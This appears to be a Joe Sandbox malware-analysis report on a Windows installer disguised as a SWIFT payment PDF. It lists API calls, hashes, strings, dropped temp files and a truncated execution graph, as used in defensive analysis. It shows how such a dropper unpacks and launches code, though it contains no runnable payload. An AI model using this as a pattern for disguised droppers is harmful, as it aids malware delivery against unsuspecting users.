                                      • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                      • String ID:
                                      • API String ID: 3294113728-0
                                      • Opcode ID: 2edcbcb0ce5bc09c9fed5e436934c6b2b427d54b956c9de44b59f354a0a616e3
                                      • Instruction ID: 94283e328d35fee59e2da4f8035aa06736476ebf885dd15e4876c46effbb42d0
                                      • Opcode Fuzzy Hash: 2edcbcb0ce5bc09c9fed5e436934c6b2b427d54b956c9de44b59f354a0a616e3
                                      • Instruction Fuzzy Hash: E4319171C00128BBCF216FA5DD89DAE7E79EF05364F20423AF520762E1C7791D408BA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040476A
                                      • GetMessagePos.USER32 ref: 00404772
                                      • ScreenToClient.USER32(?,?), ref: 0040478C
                                      • SendMessageA.USER32(?,00001111,00000000,?), ref: 0040479E
                                      • SendMessageA.USER32(?,0000110C,00000000,?), ref: 004047C4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Message$Send$ClientScreen
                                      • String ID: f
                                      • API String ID: 41195575-1993550816
                                      • Opcode ID: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction ID: 6bd71cb3d479751b3b69d93d67c88433f783f46e4abb255f82c81c082e4bdd88
                                      • Opcode Fuzzy Hash: 0143edfa65d7345696b674457d3757b6620fab040ae94d4e1f917914a8284de5
                                      • Instruction Fuzzy Hash: C5014075D00218BADB01DBA4DC45FFEBBBCAB55711F10412BBB10B71C0C7B865018BA5
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B67
                                      • MulDiv.KERNEL32(00066488,00000064,00066ED8), ref: 00402B92
                                      • wsprintfA.USER32 ref: 00402BA2
                                      • SetWindowTextA.USER32(?,?), ref: 00402BB2
                                      • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402BC4
                                      Strings
                                      • verifying installer: %d%%, xrefs: 00402B9C
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Text$ItemTimerWindowwsprintf
                                      • String ID: verifying installer: %d%%
                                      • API String ID: 1451636040-82062127
                                      • Opcode ID: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction ID: 338c4dd4cc7a1f9a3f94f7e8e9aba01fa07f8a2d27e46d6da828e47d9d426f75
                                      • Opcode Fuzzy Hash: b2596dc42376c4ed7c7376505dbeede42f27e887c2baf36158ddba7532441070
                                      • Instruction Fuzzy Hash: 32014F70540208ABEF249F61DD0AEAE37B9AB00304F00803AFA06A92D1D7B9A9518B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDC.USER32(?), ref: 00401D29
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D36
                                      • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D45
                                      • ReleaseDC.USER32(?,00000000), ref: 00401D56
                                      • CreateFontIndirectA.GDI32(0040AFA0), ref: 00401DA1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CapsCreateDeviceFontIndirectRelease
                                      • String ID: Tahoma
                                      • API String ID: 3808545654-3580928618
                                      • Opcode ID: 4b6deaec8962dedea7c43a262c6b0a52d1d618742be22b81ec12100f8d4d3c7f
                                      • Instruction ID: 4f22f7d967d41569425e1cc72a43e48c322de2a0bc5ea7779ffcdbaac11077e3
                                      • Opcode Fuzzy Hash: 4b6deaec8962dedea7c43a262c6b0a52d1d618742be22b81ec12100f8d4d3c7f
                                      • Instruction Fuzzy Hash: 760162B1958341AFE7015BB0AE1ABAF7F74A725705F100439F145BA2E2C67C14158B2B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(Epicurize Setup: Installing,Epicurize Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,0040458D,000000DF,0000040F,00000400,00000000), ref: 004046FB
                                      • wsprintfA.USER32 ref: 00404703
                                      • SetDlgItemTextA.USER32(?,Epicurize Setup: Installing), ref: 00404716
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ItemTextlstrlenwsprintf
                                      • String ID: %u.%u%s%s$Epicurize Setup: Installing
                                      • API String ID: 3540041739-960351846
                                      • Opcode ID: 474395ea6faa9e18b1b5e0ae74fba140c7d1b20ae92ef33f0ec5adb6ffe99bf7
                                      • Instruction ID: 808364b1aeea65b13bf83ed040d55ad759ad6ec36480b824a7a4bb04bc91d3c3
                                      • Opcode Fuzzy Hash: 474395ea6faa9e18b1b5e0ae74fba140c7d1b20ae92ef33f0ec5adb6ffe99bf7
                                      • Instruction Fuzzy Hash: 8B1108736002243BDB0065699C06EEF329DDBC3375F14023BFA29F61D1E9799C5182E9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetDlgItem.USER32(?), ref: 00401CD0
                                      • GetClientRect.USER32(00000000,?), ref: 00401CDD
                                      • LoadImageA.USER32(?,00000000,?,?,?,?), ref: 00401CFE
                                      • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D0C
                                      • DeleteObject.GDI32(00000000), ref: 00401D1B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                      • String ID:
                                      • API String ID: 1849352358-0
                                      • Opcode ID: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                      • Instruction ID: 7c3280a60d84a3596340f685d6ada4bc9ba3972ea03b1155ec5ca5a37b5200ea
                                      • Opcode Fuzzy Hash: 021e644993cfb9adf629f3f775699f6f2d9ab0f22eaab13517154c12b5018b7c
                                      • Instruction Fuzzy Hash: 01F04FB2905104AFD701EBA4EE88CAFB7BCEB44301B004476F601F2091C638AD018B79
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • SetWindowTextA.USER32(00000000,007A1F00), ref: 0040397F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: TextWindow
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$1033$Epicurize Setup: Installing
                                      • API String ID: 530164218-565599772
                                      • Opcode ID: 70daa21561afbffaee6324691816ec535f2df065c97ff5b03bec79a516da71ec
                                      • Instruction ID: 3eeb35b712935f7be9db67fea1ba5421606f6b55dcd8c4013f5d2095cba695b6
                                      • Opcode Fuzzy Hash: 70daa21561afbffaee6324691816ec535f2df065c97ff5b03bec79a516da71ec
                                      • Instruction Fuzzy Hash: 121108B1B046009BC721AF19CC809333BADEBC6756318823FED01673A1D77D9D028B68
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 0040562A
                                      • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004030D9,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75EE3410,0040329C), ref: 00405633
                                      • lstrcatA.KERNEL32(?,00409014), ref: 00405644
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405624
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrcatlstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 2659869361-3355392842
                                      • Opcode ID: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                      • Instruction ID: 00b6ae861ddc274f1a22631493032202eb54a79e67bc778d52c9d7871f0e19dd
                                      • Opcode Fuzzy Hash: db489587f03a436ea3115729a1eb7cc5b4759721d3bad8b493c3f74dc48da956
                                      • Instruction Fuzzy Hash: C8D0A962A099302ED20226158C05EDB3A98CF02315B040873F200B22E2C67C2D418BFE
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401EEB
                                      • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F09
                                      • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F22
                                      • VerQueryValueA.VERSION(?,00409014,?,?,?,?,?,00000000), ref: 00401F3B
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                      • String ID:
                                      • API String ID: 1404258612-0
                                      • Opcode ID: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                      • Instruction ID: d9cf4706ccd720fe68a9057b37b388a6d3cc99dc36037c8cf20abe177969b22e
                                      • Opcode Fuzzy Hash: 8a065e25df513d2c70edfbb38d14aece4aa2bad1db351d2eec3c415220230595
                                      • Instruction Fuzzy Hash: 02117071900108BEDB01EFA5DD81DAEBBB9EF04344B20807AF505F61E2D7789E54DB28
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004056CB
                                      • CharNextA.USER32(00000000), ref: 004056D0
                                      • CharNextA.USER32(00000000), ref: 004056E4
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext
                                      • String ID: outvillain\faber.div
                                      • API String ID: 3213498283-1876387199
                                      • Opcode ID: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction ID: d8a7812ab63b142c46357df6d68c050b156b7c96d32b59c6f1bc793f3f64125f
                                      • Opcode Fuzzy Hash: 3f639457ae052313cff0aaedcd272a5626d50e6f9abcac8e261aee29ca5e702c
                                      • Instruction Fuzzy Hash: 86F0C251905F91AAFB3252640C44B7B9BCCDB55315F041467E641672C1C2BD4C405F9A
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • DestroyWindow.USER32(00000000,00000000,00402DAF,00000001), ref: 00402BE2
                                      • GetTickCount.KERNEL32 ref: 00402C00
                                      • CreateDialogParamA.USER32(0000006F,00000000,00402B4C,00000000), ref: 00402C1D
                                      • ShowWindow.USER32(00000000,00000005), ref: 00402C2B
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Window$CountCreateDestroyDialogParamShowTick
                                      • String ID:
                                      • API String ID: 2102729457-0
                                      • Opcode ID: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                      • Instruction ID: d1c4e1838bfb856cd6d3ea9dd85ee240d54de3540c59ddf7a57925f8cf4fbe18
                                      • Opcode Fuzzy Hash: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                      • Instruction Fuzzy Hash: 52F0D030909620BFC6616F18BD4CE5F7BA4E745B117518467F204A11A5D27CA8838FAD
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(00000000,00000011), ref: 004024ED
                                      • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,?,?,00000000,00000011), ref: 0040250C
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll, xrefs: 004024DB, 00402500
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: FileWritelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll
                                      • API String ID: 427699356-1035503177
                                      • Opcode ID: 071ff9b93a967e41d10e7cb0e14db62d4ae7f43003ce44969fa16f51b87b1945
                                      • Instruction ID: d4cad745c1bb7ae9502ce82199ca69f85842da8443a3b9b3f3b852b520f082a9
                                      • Opcode Fuzzy Hash: 071ff9b93a967e41d10e7cb0e14db62d4ae7f43003ce44969fa16f51b87b1945
                                      • Instruction Fuzzy Hash: 4CF0E272A44245BFDB00EBA08E4AAAB3668CB01308F10843FB101F50C2D5FC99419B2D
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 0040536C
                                      • CloseHandle.KERNEL32(?), ref: 00405379
                                      Strings
                                      • Error launching installer, xrefs: 0040535A
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseCreateHandleProcess
                                      • String ID: Error launching installer
                                      • API String ID: 3712363035-66219284
                                      • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                      • Instruction ID: f3300c01cb1876a67fd1897e7389f13c8369481b1b26804573fe4f9c45dca3ad
                                      • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                      • Instruction Fuzzy Hash: 22E0ECB4900209AFDB009F64DC09E6F7BBCFB00344F40CA21BD11E2150F778E9108AA9
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75EE3410,00403565,004033A9,?), ref: 004035A7
                                      • GlobalFree.KERNEL32(0085EA98), ref: 004035AE
                                      Strings
                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040359F
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Free$GlobalLibrary
                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                      • API String ID: 1100898210-3355392842
                                      • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                      • Instruction ID: 25ceb6f6e8048fd8c7c72bafa6746df7c9a9eea5615397dbd2628d9726c916a8
                                      • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                      • Instruction Fuzzy Hash: 6EE08C32805020ABC6215F14AD0471AB6686B89B22F01406BE9407B2A087B8AD428BD8
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 00405671
                                      • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe,80000000,00000003), ref: 0040567F
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharPrevlstrlen
                                      • String ID: C:\Users\user\Desktop
                                      • API String ID: 2709904686-3370423016
                                      • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                      • Instruction ID: 066a61083934c2e15797617eaf2660ffc2c94803564b26df0c9315ada1aa8723
                                      • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                      • Instruction Fuzzy Hash: 38D0A762409D702EF30352108C04BEF6A88CF12300F0904A2E440E21D0C2781C418BED
                                      Uniqueness
                                      • Uniqueness Score: -1.00%

                                      APIs
                                        • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                        • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                      • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                      • GlobalFree.KERNEL32(?), ref: 100011C7
                                      • GlobalFree.KERNEL32(?), ref: 100011F5
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134294229538.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                      • Associated: 00000006.00000002.134294192586.0000000010000000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294264369.0000000010003000.00000002.00000001.01000000.00000008.sdmp
                                      • Associated: 00000006.00000002.134294303301.0000000010005000.00000002.00000001.01000000.00000008.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_10000000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: Global$Free$Alloclstrcpy
                                      • String ID:
                                      • API String ID: 852173138-0
                                      • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                      • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                      • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                      • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                      • lstrcmpiA.KERNEL32(?,?), ref: 004057B2
                                      • CharNextA.USER32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057C3
                                      • lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmp
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: lstrlen$CharNextlstrcmpi
                                      • String ID:
                                      • API String ID: 190613189-0
                                      • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                      • Instruction ID: df48b93824ef6af08d299fa443af8079e3e9d2208639ace1cb57769ac35cd01d
                                      • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                      • Instruction Fuzzy Hash: DBF0C235504518FFC7029BA5DC4099FBBB8EF45350F2540AAF800F7210D274EE01ABA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Execution Graph

                                      Execution Coverage:0.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:0%
                                      Total number of Nodes:1333
                                      Total number of Limit Nodes:0
4026ef 3725 403072 ReadFile 3724->3725 3726 4026f8 GlobalAlloc 3725->3726 3727 40273c WriteFile GlobalFree 3726->3727 3729 402708 3726->3729 3728 402761 3727->3728 3728->3721 3730 402733 GlobalFree 3729->3730 3730->3727 3731->3716 3732->3724 3733 40278e 3734 4029ea 18 API calls 3733->3734 3735 402794 3734->3735 3736 4027b8 3735->3736 3737 4027cf 3735->3737 3743 40266d 3735->3743 3738 4027bd 3736->3738 3746 4027cc 3736->3746 3739 4027e5 3737->3739 3740 4027d9 3737->3740 3747 405b77 lstrcpynA 3738->3747 3742 405b99 18 API calls 3739->3742 3741 4029ea 18 API calls 3740->3741 3741->3746 3742->3746 3746->3743 3748 405ad5 wsprintfA 3746->3748 3747->3743 3748->3743 3749 401490 3750 404e84 25 API calls 3749->3750 3751 401497 3750->3751 3752 401b11 3753 401b62 3752->3753 3754 401b1e 3752->3754 3755 401b66 3753->3755 3756 401b8b GlobalAlloc 3753->3756 3759 401b35 3754->3759 3761 401ba6 3754->3761 3768 402224 3755->3768 3773 405b77 lstrcpynA 3755->3773 3758 405b99 18 API calls 3756->3758 3757 405b99 18 API calls 3763 40221e 3757->3763 3758->3761 3771 405b77 lstrcpynA 3759->3771 3761->3757 3761->3768 3766 4053a8 MessageBoxIndirectA 3763->3766 3764 401b78 GlobalFree 3764->3768 3765 401b44 3772 405b77 lstrcpynA 3765->3772 3766->3768 3769 401b53 3774 405b77 lstrcpynA 3769->3774 3771->3765 3772->3769 3773->3764 3774->3768 3775 402814 3776 4029ea 18 API calls 3775->3776 3777 40281a 3776->3777 3778 402828 3777->3778 3779 40284b 3777->3779 3780 40266d 3777->3780 3778->3780 3783 405ad5 wsprintfA 3778->3783 3779->3780 3781 405b99 18 API calls 3779->3781 3781->3780 3783->3780 3784 401595 3785 402a07 18 API calls 3784->3785 3786 40159c SetFileAttributesA 3785->3786 3787 4015ae 3786->3787 3788 401c95 3789 4029ea 18 API calls 3788->3789 3790 401c9c 3789->3790 3791 4029ea 18 API calls 3790->3791 3792 401ca4 GetDlgItem 3791->3792 3793 4024c9 3792->3793 3794 402517 3795 4029ea 18 API calls 3794->3795 3798 402521 3795->3798 3796 402597 3797 402555 ReadFile 3797->3796 3797->3798 3798->3796 
3798->3797 3799 402599 3798->3799 3801 4025a9 3798->3801 3803 405ad5 wsprintfA 3799->3803 3801->3796 3802 4025bf SetFilePointer 3801->3802 3802->3796 3803->3796 3804 401918 3805 40191a 3804->3805 3806 402a07 18 API calls 3805->3806 3807 40191f 3806->3807 3808 405454 71 API calls 3807->3808 3809 401928 3808->3809 3810 40231a 3811 402320 3810->3811 3812 402a07 18 API calls 3811->3812 3813 402332 3812->3813 3814 402a07 18 API calls 3813->3814 3815 40233c RegCreateKeyExA 3814->3815 3816 402366 3815->3816 3817 40289c 3815->3817 3818 40237e 3816->3818 3819 402a07 18 API calls 3816->3819 3822 4029ea 18 API calls 3818->3822 3823 40238a 3818->3823 3821 402377 lstrlenA 3819->3821 3820 4023a5 RegSetValueExA 3824 4023bb RegCloseKey 3820->3824 3821->3818 3822->3823 3823->3820 3824->3817 3826 403f9b lstrcpynA lstrlenA 3827 404e1c 3828 404e24 IsWindowVisible 3827->3828 3833 404e3b 3827->3833 3829 404e31 3828->3829 3835 404e65 3828->3835 3830 40474f 5 API calls 3829->3830 3830->3833 3831 404e6a CallWindowProcA 3832 404e7e 3831->3832 3833->3831 3834 4047cf 4 API calls 3833->3834 3834->3835 3835->3831 3836 4016a1 3837 402a07 18 API calls 3836->3837 3838 4016a7 GetFullPathNameA 3837->3838 3839 4016df 3838->3839 3840 4016be 3838->3840 3841 4016f3 GetShortPathNameA 3839->3841 3842 40289c 3839->3842 3840->3839 3843 405e7b 2 API calls 3840->3843 3841->3842 3844 4016cf 3843->3844 3844->3839 3846 405b77 lstrcpynA 3844->3846 3846->3839 3847 401d26 GetDC GetDeviceCaps 3848 4029ea 18 API calls 3847->3848 3849 401d44 MulDiv ReleaseDC 3848->3849 3850 4029ea 18 API calls 3849->3850 3851 401d63 3850->3851 3852 405b99 18 API calls 3851->3852 3853 401d9c CreateFontIndirectA 3852->3853 3854 4024c9 3853->3854 3855 402626 3856 402629 3855->3856 3858 402641 3855->3858 3857 402636 FindNextFileA 3856->3857 3857->3858 3859 402680 3857->3859 3861 405b77 lstrcpynA 3859->3861 3861->3858 3862 40172c 3863 402a07 18 API calls 3862->3863 3864 401733 3863->3864 3865 405854 2 API calls 3864->3865 3866 40173a 
3865->3866 3866->3866 3867 401dac 3868 4029ea 18 API calls 3867->3868 3869 401db2 3868->3869 3870 4029ea 18 API calls 3869->3870 3871 401dbb 3870->3871 3872 401dc2 ShowWindow 3871->3872 3873 401dcd EnableWindow 3871->3873 3874 40289c 3872->3874 3873->3874 3875 401eac 3876 402a07 18 API calls 3875->3876 3877 401eb3 3876->3877 3878 405e7b 2 API calls 3877->3878 3879 401eb9 3878->3879 3880 401ecb 3879->3880 3882 405ad5 wsprintfA 3879->3882 3882->3880 3883 40192d 3884 402a07 18 API calls 3883->3884 3885 401934 lstrlenA 3884->3885 3886 4024c9 3885->3886 3887 4024ad 3888 402a07 18 API calls 3887->3888 3889 4024b4 3888->3889 3892 405825 GetFileAttributesA CreateFileA 3889->3892 3891 4024c0 3892->3891 3893 401cb0 3894 4029ea 18 API calls 3893->3894 3895 401cc0 SetWindowLongA 3894->3895 3896 40289c 3895->3896 3897 401a31 3898 4029ea 18 API calls 3897->3898 3899 401a37 3898->3899 3900 4029ea 18 API calls 3899->3900 3901 4019e1 3900->3901 3902 4031b1 3902->3902 3904 4031ac 3902->3904 3903 40564f CharNextA 3903->3904 3904->3903 3905 403271 GetTempPathA 3904->3905 3907 4030bb 11 API calls 3905->3907 3908 40329c DeleteFileA 3907->3908 3910 403305 3908->3910 3913 40564f CharNextA 3910->3913 3942 403390 3910->3942 3952 4033a0 3910->3952 3911 403548 74 API calls 3914 4033a9 OleUninitialize 3911->3914 3912 403622 54 API calls 3912->3952 3918 